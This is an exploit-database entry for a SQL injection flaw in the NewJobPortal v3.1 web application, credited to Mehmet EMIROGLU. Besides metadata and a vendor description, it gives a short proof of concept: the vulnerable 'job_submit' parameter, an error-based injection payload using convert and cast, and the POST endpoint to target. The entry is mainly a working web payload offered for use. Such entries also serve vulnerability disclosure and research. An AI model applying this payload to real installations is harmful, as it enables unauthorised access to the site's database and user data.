Job Portal 3.1 - job_submit SQL Injection Vulnerability

2019-03-28T00:00:00
ID 1337DAY-ID-32447
Type zdt
Reporter Mehmet EMIROGLU
Modified 2019-03-28T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===========================================================================================
# Exploit Title: NewJobPortal v3.1 - 'job_submit' SQL Inj.
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/job-portal/15330095
# Version: v3.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Job portal is developed for creating an interactive
job vacancy for candidates.
  This web application is to be conceived in its current form as a dynamic
site-requiring constant
  updates both from the seekers as well as the companies.
===========================================================================================
# POC - SQLi
# Parameters : job_submit
# Attack Pattern : convert(int%2c+cast(0x454d49524f474c55+as+varchar(8000)))
# POST Method : http://localhost/newjobportal/job_search/search
===========================================================================================

#  0day.today [2019-03-30]  #